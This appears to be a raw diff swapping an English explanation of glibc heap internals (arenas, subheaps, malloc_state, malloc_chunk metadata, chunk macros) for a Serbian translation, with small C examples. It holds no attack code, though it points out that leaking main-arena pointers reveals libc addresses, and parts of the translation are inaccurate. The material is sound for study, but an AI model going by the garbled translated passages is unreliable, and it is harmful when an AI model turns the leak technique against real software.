pozivajući funkcije kao što su **`malloc`**, `calloc`... Pored toga, kada ova memorija više nije potrebna, postaje dostupna pozivajući funkciju **`free`**. -As it's shown, its just after where the binary is being loaded in memory (check the `[heap]` section): +Kao što je prikazano, to je odmah nakon što se binarni kod učita u memoriju (proverite odeljak `[heap]`):
-### Basic Chunk Allocation +### Osnovna Alokacija Chunk-a -When some data is requested to be stored in the heap, some space of the heap is allocated to it. This space will belong to a bin and only the requested data + the space of the bin headers + minimum bin size offset will be reserved for the chunk. The goal is to just reserve as minimum memory as possible without making it complicated to find where each chunk is. For this, the metadata chunk information is used to know where each used/free chunk is. +Kada se zatraže neki podaci da budu smešteni u heap, određeni deo heap-a se alocira za njih. Ovaj prostor će pripadati bini i samo će zatraženi podaci + prostor bin zaglavlja + minimalni offset veličine bina biti rezervisani za chunk. Cilj je da se rezerviše što manje memorije bez otežavanja pronalaženja gde se svaki chunk nalazi. Za to se koristi informacija o metapodacima chunk-a da bi se znalo gde se nalazi svaki korišćeni/slobodni chunk. -There are different ways to reserver the space mainly depending on the used bin, but a general methodology is the following: +Postoje različiti načini za rezervaciju prostora, uglavnom zavisno od korišćenog bina, ali opšta metodologija je sledeća: -- The program starts by requesting certain amount of memory. -- If in the list of chunks there someone available big enough to fulfil the request, it'll be used - - This might even mean that part of the available chunk will be used for this request and the rest will be added to the chunks list -- If there isn't any available chunk in the list but there is still space in allocated heap memory, the heap manager creates a new chunk -- If there is not enough heap space to allocate the new chunk, the heap manager asks the kernel to expand the memory allocated to the heap and then use this memory to generate the new chunk -- If everything fails, `malloc` returns null. +- Program počinje zahtevajući određenu količinu memorije. +- Ako u listi chunk-ova postoji neki dostupan dovoljno veliki da ispuni zahtev, biće korišćen. +- To može čak značiti da će deo dostupnog chunk-a biti korišćen za ovaj zahtev, a ostatak će biti dodat u listu chunk-ova. +- Ako u listi nema dostupnog chunk-a, ali još uvek ima prostora u alociranoj heap memoriji, upravnik heap-a kreira novi chunk. +- Ako nema dovoljno prostora u heap-u da se alocira novi chunk, upravnik heap-a traži od kernela da proširi memoriju alociranu za heap i zatim koristi ovu memoriju za generisanje novog chunk-a. +- Ako sve ne uspe, `malloc` vraća null. -Note that if the requested **memory passes a threshold**, **`mmap`** will be used to map the requested memory. +Napomena: ako zatražena **memorija pređe prag**, **`mmap`** će biti korišćen za mapiranje zatražene memorije. ## Arenas -In **multithreaded** applications, the heap manager must prevent **race conditions** that could lead to crashes. Initially, this was done using a **global mutex** to ensure that only one thread could access the heap at a time, but this caused **performance issues** due to the mutex-induced bottleneck. +U **multithreaded** aplikacijama, upravnik heap-a mora sprečiti **trke** koje bi mogle dovesti do rušenja. U početku, to je postignuto korišćenjem **globalnog mutex-a** kako bi se osiguralo da samo jedna nit može pristupiti heap-u u isto vreme, ali to je izazvalo **probleme sa performansama** zbog uskog grla izazvanog mutex-om. -To address this, the ptmalloc2 heap allocator introduced "arenas," where **each arena** acts as a **separate heap** with its **own** data **structures** and **mutex**, allowing multiple threads to perform heap operations without interfering with each other, as long as they use different arenas. +Da bi se to rešilo, ptmalloc2 alokator heap-a je uveo "arene", gde **svaka arena** deluje kao **odvojeni heap** sa svojim **vlastitim** podacima **strukture** i **mutex-om**, omogućavajući više niti da obavljaju operacije na heap-u bez ometanja jedna druge, sve dok koriste različite arene. -The default "main" arena handles heap operations for single-threaded applications. When **new threads** are added, the heap manager assigns them **secondary arenas** to reduce contention. It first attempts to attach each new thread to an unused arena, creating new ones if needed, up to a limit of 2 times the number of CPU cores for 32-bit systems and 8 times for 64-bit systems. Once the limit is reached, **threads must share arenas**, leading to potential contention. +Podrazumevana "glavna" arena upravlja operacijama na heap-u za aplikacije sa jednom niti. Kada se **nove niti** dodaju, upravnik heap-a im dodeljuje **sekundarne arene** kako bi smanjio sukobe. Prvo pokušava da poveže svaku novu nit sa neiskorišćenom arenom, kreirajući nove ako je potrebno, do limita od 2 puta broja CPU jezgara za 32-bitne sisteme i 8 puta za 64-bitne sisteme. Kada se dostigne limit, **niti moraju deliti arene**, što može dovesti do potencijalnih sukoba. -Unlike the main arena, which expands using the `brk` system call, secondary arenas create "subheaps" using `mmap` and `mprotect` to simulate the heap behaviour, allowing flexibility in managing memory for multithreaded operations. +Za razliku od glavne arene, koja se širi korišćenjem `brk` sistemskog poziva, sekundarne arene kreiraju "subheaps" koristeći `mmap` i `mprotect` kako bi simulirale ponašanje heap-a, omogućavajući fleksibilnost u upravljanju memorijom za multithreaded operacije. ### Subheaps -Subheaps serve as memory reserves for secondary arenas in multithreaded applications, allowing them to grow and manage their own heap regions separately from the main heap. Here's how subheaps differ from the initial heap and how they operate: +Subheaps služe kao rezerve memorije za sekundarne arene u multithreaded aplikacijama, omogućavajući im da rastu i upravljaju svojim regionima heap-a odvojeno od glavnog heap-a. Evo kako se subheaps razlikuju od inicijalnog heap-a i kako funkcionišu: -1. **Initial Heap vs. Subheaps**: - - The initial heap is located directly after the program's binary in memory, and it expands using the `sbrk` system call. - - Subheaps, used by secondary arenas, are created through `mmap`, a system call that maps a specified memory region. -2. **Memory Reservation with `mmap`**: - - When the heap manager creates a subheap, it reserves a large block of memory through `mmap`. This reservation doesn't allocate memory immediately; it simply designates a region that other system processes or allocations shouldn't use. - - By default, the reserved size for a subheap is 1 MB for 32-bit processes and 64 MB for 64-bit processes. -3. **Gradual Expansion with `mprotect`**: - - The reserved memory region is initially marked as `PROT_NONE`, indicating that the kernel doesn't need to allocate physical memory to this space yet. - - To "grow" the subheap, the heap manager uses `mprotect` to change page permissions from `PROT_NONE` to `PROT_READ | PROT_WRITE`, prompting the kernel to allocate physical memory to the previously reserved addresses. This step-by-step approach allows the subheap to expand as needed. - - Once the entire subheap is exhausted, the heap manager creates a new subheap to continue allocation. +1. **Inicijalni Heap vs. Subheaps**: +- Inicijalni heap se nalazi direktno nakon binarnog koda programa u memoriji, i širi se korišćenjem `sbrk` sistemskog poziva. +- Subheaps, koje koriste sekundarne arene, kreiraju se putem `mmap`, sistemskog poziva koji mapira određeni region memorije. +2. **Rezervacija Memorije sa `mmap`**: +- Kada upravnik heap-a kreira subheap, rezerviše veliki blok memorije putem `mmap`. Ova rezervacija ne alocira memoriju odmah; jednostavno označava region koji drugi sistemski procesi ili alokacije ne bi trebali koristiti. +- Podrazumevana veličina rezervacije za subheap je 1 MB za 32-bitne procese i 64 MB za 64-bitne procese. +3. **Postepeno Širenje sa `mprotect`**: +- Rezervisana memorijska oblast je inicijalno označena kao `PROT_NONE`, što ukazuje da kernel ne mora da alocira fizičku memoriju za ovaj prostor još. +- Da bi "rastegao" subheap, upravnik heap-a koristi `mprotect` da promeni dozvole stranica sa `PROT_NONE` na `PROT_READ | PROT_WRITE`, podstičući kernel da alocira fizičku memoriju za prethodno rezervisane adrese. Ovaj postepeni pristup omogućava subheap-u da se širi po potrebi. +- Kada se ceo subheap iscrpi, upravnik heap-a kreira novi subheap da bi nastavio alokaciju. ### heap_info -This struct allocates relevant information of the heap. Moreover, heap memory might not be continuous after more allocations, this struct will also store that info. - +Ova struktura alocira relevantne informacije o heap-u. Pored toga, heap memorija možda neće biti kontinuirana nakon više alokacija, ova struktura će takođe čuvati te informacije. ```c // From https://github.com/bminor/glibc/blob/a07e000e82cb71238259e674529c37c12dc7d423/malloc/arena.c#L837 typedef struct _heap_info { - mstate ar_ptr; /* Arena for this heap. */ - struct _heap_info *prev; /* Previous heap. */ - size_t size; /* Current size in bytes. */ - size_t mprotect_size; /* Size in bytes that has been mprotected - PROT_READ|PROT_WRITE. */ - size_t pagesize; /* Page size used when allocating the arena. */ - /* Make sure the following data is properly aligned, particularly - that sizeof (heap_info) + 2 * SIZE_SZ is a multiple of - MALLOC_ALIGNMENT. */ - char pad[-3 * SIZE_SZ & MALLOC_ALIGN_MASK]; +mstate ar_ptr; /* Arena for this heap. */ +struct _heap_info *prev; /* Previous heap. */ +size_t size; /* Current size in bytes. */ +size_t mprotect_size; /* Size in bytes that has been mprotected +PROT_READ|PROT_WRITE. */ +size_t pagesize; /* Page size used when allocating the arena. */ +/* Make sure the following data is properly aligned, particularly +that sizeof (heap_info) + 2 * SIZE_SZ is a multiple of +MALLOC_ALIGNMENT. */ +char pad[-3 * SIZE_SZ & MALLOC_ALIGN_MASK]; } heap_info; ``` - ### malloc_state -**Each heap** (main arena or other threads arenas) has a **`malloc_state` structure.**\ -It’s important to notice that the **main arena `malloc_state`** structure is a **global variable in the libc** (therefore located in the libc memory space).\ -In the case of **`malloc_state`** structures of the heaps of threads, they are located **inside own thread "heap"**. +**Svaka heap** (glavna arena ili druge arene niti) ima **`malloc_state` strukturu.**\ +Važno je napomenuti da je **glavna arena `malloc_state`** struktura **globalna promenljiva u libc** (stoga se nalazi u libc memorijskom prostoru).\ +U slučaju **`malloc_state`** struktura heap-ova niti, one se nalaze **unutar vlastitog "heap"-a niti**. -There some interesting things to note from this structure (see C code below): +Postoje neke zanimljive stvari koje treba primetiti iz ove strukture (vidi C kod ispod): -- `__libc_lock_define (, mutex);` Is there to make sure this structure from the heap is accessed by 1 thread at a time -- Flags: +- `__libc_lock_define (, mutex);` je tu da osigura da se ova struktura iz heap-a pristupa od strane 1 niti u isto vreme +- Zastavice: - - ```c - #define NONCONTIGUOUS_BIT (2U) +- ```c +#define NONCONTIGUOUS_BIT (2U) - #define contiguous(M) (((M)->flags & NONCONTIGUOUS_BIT) == 0) - #define noncontiguous(M) (((M)->flags & NONCONTIGUOUS_BIT) != 0) - #define set_noncontiguous(M) ((M)->flags |= NONCONTIGUOUS_BIT) - #define set_contiguous(M) ((M)->flags &= ~NONCONTIGUOUS_BIT) - ``` - -- The `mchunkptr bins[NBINS * 2 - 2];` contains **pointers** to the **first and last chunks** of the small, large and unsorted **bins** (the -2 is because the index 0 is not used) - - Therefore, the **first chunk** of these bins will have a **backwards pointer to this structure** and the **last chunk** of these bins will have a **forward pointer** to this structure. Which basically means that if you can l**eak these addresses in the main arena** you will have a pointer to the structure in the **libc**. -- The structs `struct malloc_state *next;` and `struct malloc_state *next_free;` are linked lists os arenas -- The `top` chunk is the last "chunk", which is basically **all the heap reminding space**. Once the top chunk is "empty", the heap is completely used and it needs to request more space. -- The `last reminder` chunk comes from cases where an exact size chunk is not available and therefore a bigger chunk is splitter, a pointer remaining part is placed here. +#define contiguous(M) (((M)->flags & NONCONTIGUOUS_BIT) == 0) +#define noncontiguous(M) (((M)->flags & NONCONTIGUOUS_BIT) != 0) +#define set_noncontiguous(M) ((M)->flags |= NONCONTIGUOUS_BIT) +#define set_contiguous(M) ((M)->flags &= ~NONCONTIGUOUS_BIT) +``` +- `mchunkptr bins[NBINS * 2 - 2];` sadrži **pokazivače** na **prvi i poslednji chunk** malih, velikih i nesortiranih **bins** ( -2 je zato što se indeks 0 ne koristi) +- Stoga, **prvi chunk** ovih bins će imati **povratni pokazivač na ovu strukturu** i **poslednji chunk** ovih bins će imati **napredni pokazivač** na ovu strukturu. Što u suštini znači da ako možete **procuriti ove adrese u glavnoj areni** imaćete pokazivač na strukturu u **libc**. +- Strukture `struct malloc_state *next;` i `struct malloc_state *next_free;` su povezane liste arena +- `top` chunk je poslednji "chunk", koji je u suštini **sva preostala memorija heap-a**. Kada je top chunk "prazan", heap je potpuno iskorišćen i treba zatražiti više prostora. +- `last reminder` chunk dolazi iz slučajeva kada tačno veličine chunk nije dostupna i stoga je veći chunk podeljen, a pokazivač preostalog dela se ovde postavlja. ```c // From https://github.com/bminor/glibc/blob/a07e000e82cb71238259e674529c37c12dc7d423/malloc/malloc.c#L1812 struct malloc_state { - /* Serialize access. */ - __libc_lock_define (, mutex); +/* Serialize access. */ +__libc_lock_define (, mutex); - /* Flags (formerly in max_fast). */ - int flags; +/* Flags (formerly in max_fast). */ +int flags; - /* Set if the fastbin chunks contain recently inserted free blocks. */ - /* Note this is a bool but not all targets support atomics on booleans. */ - int have_fastchunks; +/* Set if the fastbin chunks contain recently inserted free blocks. */ +/* Note this is a bool but not all targets support atomics on booleans. */ +int have_fastchunks; - /* Fastbins */ - mfastbinptr fastbinsY[NFASTBINS]; +/* Fastbins */ +mfastbinptr fastbinsY[NFASTBINS]; - /* Base of the topmost chunk -- not otherwise kept in a bin */ - mchunkptr top; +/* Base of the topmost chunk -- not otherwise kept in a bin */ +mchunkptr top; - /* The remainder from the most recent split of a small request */ - mchunkptr last_remainder; +/* The remainder from the most recent split of a small request */ +mchunkptr last_remainder; - /* Normal bins packed as described above */ - mchunkptr bins[NBINS * 2 - 2]; +/* Normal bins packed as described above */ +mchunkptr bins[NBINS * 2 - 2]; - /* Bitmap of bins */ - unsigned int binmap[BINMAPSIZE]; +/* Bitmap of bins */ +unsigned int binmap[BINMAPSIZE]; - /* Linked list */ - struct malloc_state *next; +/* Linked list */ +struct malloc_state *next; - /* Linked list for free arenas. Access to this field is serialized - by free_list_lock in arena.c. */ - struct malloc_state *next_free; +/* Linked list for free arenas. Access to this field is serialized +by free_list_lock in arena.c. */ +struct malloc_state *next_free; - /* Number of threads attached to this arena. 0 if the arena is on - the free list. Access to this field is serialized by - free_list_lock in arena.c. */ - INTERNAL_SIZE_T attached_threads; +/* Number of threads attached to this arena. 0 if the arena is on +the free list. Access to this field is serialized by +free_list_lock in arena.c. */ +INTERNAL_SIZE_T attached_threads; - /* Memory allocated from the system in this arena. */ - INTERNAL_SIZE_T system_mem; - INTERNAL_SIZE_T max_system_mem; +/* Memory allocated from the system in this arena. */ +INTERNAL_SIZE_T system_mem; +INTERNAL_SIZE_T max_system_mem; }; ``` - ### malloc_chunk -This structure represents a particular chunk of memory. The various fields have different meaning for allocated and unallocated chunks. - +Ova struktura predstavlja određeni deo memorije. Različita polja imaju različita značenja za alocirane i nealokirane delove. ```c // https://github.com/bminor/glibc/blob/master/malloc/malloc.c struct malloc_chunk { - INTERNAL_SIZE_T mchunk_prev_size; /* Size of previous chunk, if it is free. */ - INTERNAL_SIZE_T mchunk_size; /* Size in bytes, including overhead. */ - struct malloc_chunk* fd; /* double links -- used only if this chunk is free. */ - struct malloc_chunk* bk; - /* Only used for large blocks: pointer to next larger size. */ - struct malloc_chunk* fd_nextsize; /* double links -- used only if this chunk is free. */ - struct malloc_chunk* bk_nextsize; +INTERNAL_SIZE_T mchunk_prev_size; /* Size of previous chunk, if it is free. */ +INTERNAL_SIZE_T mchunk_size; /* Size in bytes, including overhead. */ +struct malloc_chunk* fd; /* double links -- used only if this chunk is free. */ +struct malloc_chunk* bk; +/* Only used for large blocks: pointer to next larger size. */ +struct malloc_chunk* fd_nextsize; /* double links -- used only if this chunk is free. */ +struct malloc_chunk* bk_nextsize; }; typedef struct malloc_chunk* mchunkptr; ``` - -As commented previously, these chunks also have some metadata, very good represented in this image: +Kao što je prethodno komentarisano, ovi delovi takođe imaju neke metapodatke, veoma dobro predstavljene na ovoj slici:

https://azeria-labs.com/wp-content/uploads/2019/03/chunk-allocated-CS.png

-The metadata is usually 0x08B indicating the current chunk size using the last 3 bits to indicate: +Metapodaci obično imaju vrednost 0x08B koja označava trenutnu veličinu dela koristeći poslednja 3 bita za označavanje: -- `A`: If 1 it comes from a subheap, if 0 it's in the main arena -- `M`: If 1, this chunk is part of a space allocated with mmap and not part of a heap -- `P`: If 1, the previous chunk is in use +- `A`: Ako je 1, dolazi iz podheap-a, ako je 0, u glavnoj areni je +- `M`: Ako je 1, ovaj deo je deo prostora dodeljenog sa mmap i nije deo heap-a +- `P`: Ako je 1, prethodni deo je u upotrebi -Then, the space for the user data, and finally 0x08B to indicate the previous chunk size when the chunk is available (or to store user data when it's allocated). +Zatim, prostor za korisničke podatke, i konačno 0x08B da označi veličinu prethodnog dela kada je deo dostupan (ili da čuva korisničke podatke kada je dodeljen). -Moreover, when available, the user data is used to contain also some data: +Štaviše, kada je dostupan, korisnički podaci se koriste i za sadržaj nekih podataka: -- **`fd`**: Pointer to the next chunk -- **`bk`**: Pointer to the previous chunk -- **`fd_nextsize`**: Pointer to the first chunk in the list is smaller than itself -- **`bk_nextsize`:** Pointer to the first chunk the list that is larger than itself +- **`fd`**: Pokazivač na sledeći deo +- **`bk`**: Pokazivač na prethodni deo +- **`fd_nextsize`**: Pokazivač na prvi deo u listi koji je manji od njega samog +- **`bk_nextsize`:** Pokazivač na prvi deo u listi koji je veći od njega samog

https://azeria-labs.com/wp-content/uploads/2019/03/chunk-allocated-CS.png

> [!NOTE] -> Note how liking the list this way prevents the need to having an array where every single chunk is being registered. +> Obratite pažnju kako povezivanje liste na ovaj način sprečava potrebu za imanjem niza u kojem se registruje svaki pojedinačni deo. -### Chunk Pointers - -When malloc is used a pointer to the content that can be written is returned (just after the headers), however, when managing chunks, it's needed a pointer to the begining of the headers (metadata).\ -For these conversions these functions are used: +### Pokazivači na delove +Kada se koristi malloc, vraća se pokazivač na sadržaj koji može biti napisan (odmah nakon zaglavlja), međutim, kada se upravlja delovima, potreban je pokazivač na početak zaglavlja (metapodaci).\ +Za ove konverzije koriste se ove funkcije: ```c // https://github.com/bminor/glibc/blob/master/malloc/malloc.c @@ -207,13 +200,11 @@ For these conversions these functions are used: /* The smallest size we can malloc is an aligned minimal chunk */ #define MINSIZE \ - (unsigned long)(((MIN_CHUNK_SIZE+MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK)) +(unsigned long)(((MIN_CHUNK_SIZE+MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK)) ``` +### Poravnanje i minimalna veličina -### Alignment & min size - -The pointer to the chunk and `0x0f` must be 0. - +Pokazivač na deo i `0x0f` moraju biti 0. ```c // From https://github.com/bminor/glibc/blob/a07e000e82cb71238259e674529c37c12dc7d423/sysdeps/generic/malloc-size.h#L61 #define MALLOC_ALIGN_MASK (MALLOC_ALIGNMENT - 1) @@ -227,56 +218,54 @@ The pointer to the chunk and `0x0f` must be 0. #define aligned_OK(m) (((unsigned long)(m) & MALLOC_ALIGN_MASK) == 0) #define misaligned_chunk(p) \ - ((uintptr_t)(MALLOC_ALIGNMENT == CHUNK_HDR_SZ ? (p) : chunk2mem (p)) \ - & MALLOC_ALIGN_MASK) +((uintptr_t)(MALLOC_ALIGNMENT == CHUNK_HDR_SZ ? (p) : chunk2mem (p)) \ +& MALLOC_ALIGN_MASK) /* pad request bytes into a usable size -- internal version */ /* Note: This must be a macro that evaluates to a compile time constant - if passed a literal constant. */ +if passed a literal constant. */ #define request2size(req) \ - (((req) + SIZE_SZ + MALLOC_ALIGN_MASK < MINSIZE) ? \ - MINSIZE : \ - ((req) + SIZE_SZ + MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK) +(((req) + SIZE_SZ + MALLOC_ALIGN_MASK < MINSIZE) ? \ +MINSIZE : \ +((req) + SIZE_SZ + MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK) /* Check if REQ overflows when padded and aligned and if the resulting - value is less than PTRDIFF_T. Returns the requested size or - MINSIZE in case the value is less than MINSIZE, or 0 if any of the - previous checks fail. */ +value is less than PTRDIFF_T. Returns the requested size or +MINSIZE in case the value is less than MINSIZE, or 0 if any of the +previous checks fail. */ static inline size_t checked_request2size (size_t req) __nonnull (1) { - if (__glibc_unlikely (req > PTRDIFF_MAX)) - return 0; +if (__glibc_unlikely (req > PTRDIFF_MAX)) +return 0; - /* When using tagged memory, we cannot share the end of the user - block with the header for the next chunk, so ensure that we - allocate blocks that are rounded up to the granule size. Take - care not to overflow from close to MAX_SIZE_T to a small - number. Ideally, this would be part of request2size(), but that - must be a macro that produces a compile time constant if passed - a constant literal. */ - if (__glibc_unlikely (mtag_enabled)) - { - /* Ensure this is not evaluated if !mtag_enabled, see gcc PR 99551. */ - asm (""); +/* When using tagged memory, we cannot share the end of the user +block with the header for the next chunk, so ensure that we +allocate blocks that are rounded up to the granule size. Take +care not to overflow from close to MAX_SIZE_T to a small +number. Ideally, this would be part of request2size(), but that +must be a macro that produces a compile time constant if passed +a constant literal. */ +if (__glibc_unlikely (mtag_enabled)) +{ +/* Ensure this is not evaluated if !mtag_enabled, see gcc PR 99551. */ +asm (""); - req = (req + (__MTAG_GRANULE_SIZE - 1)) & - ~(size_t)(__MTAG_GRANULE_SIZE - 1); - } +req = (req + (__MTAG_GRANULE_SIZE - 1)) & +~(size_t)(__MTAG_GRANULE_SIZE - 1); +} - return request2size (req); +return request2size (req); } ``` +Napomena da se za izračunavanje ukupnog potrebnog prostora `SIZE_SZ` dodaje samo 1 put jer se polje `prev_size` može koristiti za skladištenje podataka, stoga je potreban samo inicijalni zaglavlje. -Note that for calculating the total space needed it's only added `SIZE_SZ` 1 time because the `prev_size` field can be used to store data, therefore only the initial header is needed. +### Preuzmi Chunk podatke i izmeni metapodatke -### Get Chunk data and alter metadata - -These functions work by receiving a pointer to a chunk and are useful to check/set metadata: - -- Check chunk flags +Ove funkcije rade tako što primaju pokazivač na chunk i korisne su za proveru/postavljanje metapodataka: +- Proveri chunk zastavice ```c // From https://github.com/bminor/glibc/blob/master/malloc/malloc.c @@ -296,8 +285,8 @@ These functions work by receiving a pointer to a chunk and are useful to check/s /* size field is or'ed with NON_MAIN_ARENA if the chunk was obtained - from a non-main arena. This is only set immediately before handing - the chunk to the user, if necessary. */ +from a non-main arena. This is only set immediately before handing +the chunk to the user, if necessary. */ #define NON_MAIN_ARENA 0x4 /* Check for chunk from main arena. */ @@ -306,18 +295,16 @@ These functions work by receiving a pointer to a chunk and are useful to check/s /* Mark a chunk as not being on the main arena. */ #define set_non_main_arena(p) ((p)->mchunk_size |= NON_MAIN_ARENA) ``` - -- Sizes and pointers to other chunks - +- Veličine i pokazivači na druge delove ```c /* - Bits to mask off when extracting size +Bits to mask off when extracting size - Note: IS_MMAPPED is intentionally not masked off from size field in - macros for which mmapped chunks should never be seen. This should - cause helpful core dumps to occur if it is tried by accident by - people extending or adapting this malloc. - */ +Note: IS_MMAPPED is intentionally not masked off from size field in +macros for which mmapped chunks should never be seen. This should +cause helpful core dumps to occur if it is tried by accident by +people extending or adapting this malloc. +*/ #define SIZE_BITS (PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA) /* Get size, ignoring use bits */ @@ -341,35 +328,31 @@ These functions work by receiving a pointer to a chunk and are useful to check/s /* Treat space at ptr + offset as a chunk */ #define chunk_at_offset(p, s) ((mchunkptr) (((char *) (p)) + (s))) ``` - - Insue bit - ```c /* extract p's inuse bit */ #define inuse(p) \ - ((((mchunkptr) (((char *) (p)) + chunksize (p)))->mchunk_size) & PREV_INUSE) +((((mchunkptr) (((char *) (p)) + chunksize (p)))->mchunk_size) & PREV_INUSE) /* set/clear chunk as being inuse without otherwise disturbing */ #define set_inuse(p) \ - ((mchunkptr) (((char *) (p)) + chunksize (p)))->mchunk_size |= PREV_INUSE +((mchunkptr) (((char *) (p)) + chunksize (p)))->mchunk_size |= PREV_INUSE #define clear_inuse(p) \ - ((mchunkptr) (((char *) (p)) + chunksize (p)))->mchunk_size &= ~(PREV_INUSE) +((mchunkptr) (((char *) (p)) + chunksize (p)))->mchunk_size &= ~(PREV_INUSE) /* check/set/clear inuse bits in known places */ #define inuse_bit_at_offset(p, s) \ - (((mchunkptr) (((char *) (p)) + (s)))->mchunk_size & PREV_INUSE) +(((mchunkptr) (((char *) (p)) + (s)))->mchunk_size & PREV_INUSE) #define set_inuse_bit_at_offset(p, s) \ - (((mchunkptr) (((char *) (p)) + (s)))->mchunk_size |= PREV_INUSE) +(((mchunkptr) (((char *) (p)) + (s)))->mchunk_size |= PREV_INUSE) #define clear_inuse_bit_at_offset(p, s) \ - (((mchunkptr) (((char *) (p)) + (s)))->mchunk_size &= ~(PREV_INUSE)) +(((mchunkptr) (((char *) (p)) + (s)))->mchunk_size &= ~(PREV_INUSE)) ``` - -- Set head and footer (when chunk nos in use - +- Postavite zaglavlje i podnožje (kada se koriste brojevi delova) ```c /* Set size at head, without disturbing its use bit */ #define set_head_size(p, s) ((p)->mchunk_size = (((p)->mchunk_size & SIZE_BITS) | (s))) @@ -380,44 +363,40 @@ These functions work by receiving a pointer to a chunk and are useful to check/s /* Set size at footer (only when chunk is not in use) */ #define set_foot(p, s) (((mchunkptr) ((char *) (p) + (s)))->mchunk_prev_size = (s)) ``` - -- Get the size of the real usable data inside the chunk - +- Dobijte veličinu stvarnih upotrebljivih podataka unutar dela ```c #pragma GCC poison mchunk_size #pragma GCC poison mchunk_prev_size /* This is the size of the real usable data in the chunk. Not valid for - dumped heap chunks. */ +dumped heap chunks. */ #define memsize(p) \ - (__MTAG_GRANULE_SIZE > SIZE_SZ && __glibc_unlikely (mtag_enabled) ? \ - chunksize (p) - CHUNK_HDR_SZ : \ - chunksize (p) - CHUNK_HDR_SZ + (chunk_is_mmapped (p) ? 0 : SIZE_SZ)) +(__MTAG_GRANULE_SIZE > SIZE_SZ && __glibc_unlikely (mtag_enabled) ? \ +chunksize (p) - CHUNK_HDR_SZ : \ +chunksize (p) - CHUNK_HDR_SZ + (chunk_is_mmapped (p) ? 0 : SIZE_SZ)) /* If memory tagging is enabled the layout changes to accommodate the granule - size, this is wasteful for small allocations so not done by default. - Both the chunk header and user data has to be granule aligned. */ +size, this is wasteful for small allocations so not done by default. +Both the chunk header and user data has to be granule aligned. */ _Static_assert (__MTAG_GRANULE_SIZE <= CHUNK_HDR_SZ, - "memory tagging is not supported with large granule."); +"memory tagging is not supported with large granule."); static __always_inline void * tag_new_usable (void *ptr) { - if (__glibc_unlikely (mtag_enabled) && ptr) - { - mchunkptr cp = mem2chunk(ptr); - ptr = __libc_mtag_tag_region (__libc_mtag_new_tag (ptr), memsize (cp)); - } - return ptr; +if (__glibc_unlikely (mtag_enabled) && ptr) +{ +mchunkptr cp = mem2chunk(ptr); +ptr = __libc_mtag_tag_region (__libc_mtag_new_tag (ptr), memsize (cp)); +} +return ptr; } ``` +## Primeri -## Examples - -### Quick Heap Example - -Quick heap example from [https://guyinatuxedo.github.io/25-heap/index.html](https://guyinatuxedo.github.io/25-heap/index.html) but in arm64: +### Brzi Heap Primer +Brzi heap primer sa [https://guyinatuxedo.github.io/25-heap/index.html](https://guyinatuxedo.github.io/25-heap/index.html) ali u arm64: ```c #include #include @@ -425,32 +404,28 @@ Quick heap example from [https://guyinatuxedo.github.io/25-heap/index.html](http void main(void) { - char *ptr; - ptr = malloc(0x10); - strcpy(ptr, "panda"); +char *ptr; +ptr = malloc(0x10); +strcpy(ptr, "panda"); } ``` - -Set a breakpoint at the end of the main function and lets find out where the information was stored: +Postavite tačku prekida na kraju glavne funkcije i hajde da saznamo gde je informacija sačuvana:
-It's possible to see that the string panda was stored at `0xaaaaaaac12a0` (which was the address given as response by malloc inside `x0`). Checking 0x10 bytes before it's possible to see that the `0x0` represents that the **previous chunk is not used** (length 0) and that the length of this chunk is `0x21`. - -The extra spaces reserved (0x21-0x10=0x11) comes from the **added headers** (0x10) and 0x1 doesn't mean that it was reserved 0x21B but the last 3 bits of the length of the current headed have the some special meanings. As the length is always 16-byte aligned (in 64bits machines), these bits are actually never going to be used by the length number. +Moguće je videti da je string panda sačuvan na `0xaaaaaaac12a0` (što je adresa koju je vratio malloc unutar `x0`). Proveravajući 0x10 bajtova pre, moguće je videti da `0x0` predstavlja da **prethodni deo nije korišćen** (dužina 0) i da je dužina ovog dela `0x21`. +Dodatni prostori rezervisani (0x21-0x10=0x11) dolaze od **dodatih zaglavlja** (0x10) i 0x1 ne znači da je rezervisano 0x21B, već poslednja 3 bita dužine trenutnog zaglavlja imaju neka posebna značenja. Pošto je dužina uvek poravnata na 16 bajtova (na 64-bitnim mašinama), ovi bitovi se zapravo nikada neće koristiti za broj dužine. ``` 0x1: Previous in Use - Specifies that the chunk before it in memory is in use 0x2: Is MMAPPED - Specifies that the chunk was obtained with mmap() 0x4: Non Main Arena - Specifies that the chunk was obtained from outside of the main arena ``` - -### Multithreading Example +### Primer višestrukog niti
-Multithread - +Višestruka nit ```c #include #include @@ -460,56 +435,55 @@ The extra spaces reserved (0x21-0x10=0x11) comes from the **added headers** (0x1 void* threadFuncMalloc(void* arg) { - printf("Hello from thread 1\n"); - char* addr = (char*) malloc(1000); - printf("After malloc and before free in thread 1\n"); - free(addr); - printf("After free in thread 1\n"); +printf("Hello from thread 1\n"); +char* addr = (char*) malloc(1000); +printf("After malloc and before free in thread 1\n"); +free(addr); +printf("After free in thread 1\n"); } void* threadFuncNoMalloc(void* arg) { - printf("Hello from thread 2\n"); +printf("Hello from thread 2\n"); } int main() { - pthread_t t1; - void* s; - int ret; - char* addr; +pthread_t t1; +void* s; +int ret; +char* addr; - printf("Before creating thread 1\n"); - getchar(); - ret = pthread_create(&t1, NULL, threadFuncMalloc, NULL); - getchar(); +printf("Before creating thread 1\n"); +getchar(); +ret = pthread_create(&t1, NULL, threadFuncMalloc, NULL); +getchar(); - printf("Before creating thread 2\n"); - ret = pthread_create(&t1, NULL, threadFuncNoMalloc, NULL); +printf("Before creating thread 2\n"); +ret = pthread_create(&t1, NULL, threadFuncNoMalloc, NULL); - printf("Before exit\n"); - getchar(); +printf("Before exit\n"); +getchar(); - return 0; +return 0; } ``` -
-Debugging the previous example it's possible to see how at the beginning there is only 1 arena: +Debugging prethodnog primera moguće je videti kako na početku postoji samo 1 arena:
-Then, after calling the first thread, the one that calls malloc, a new arena is created: +Zatim, nakon pozivanja prvog threada, onog koji poziva malloc, kreira se nova arena:
-and inside of it some chunks can be found: +i unutar nje mogu se naći neki chunks:
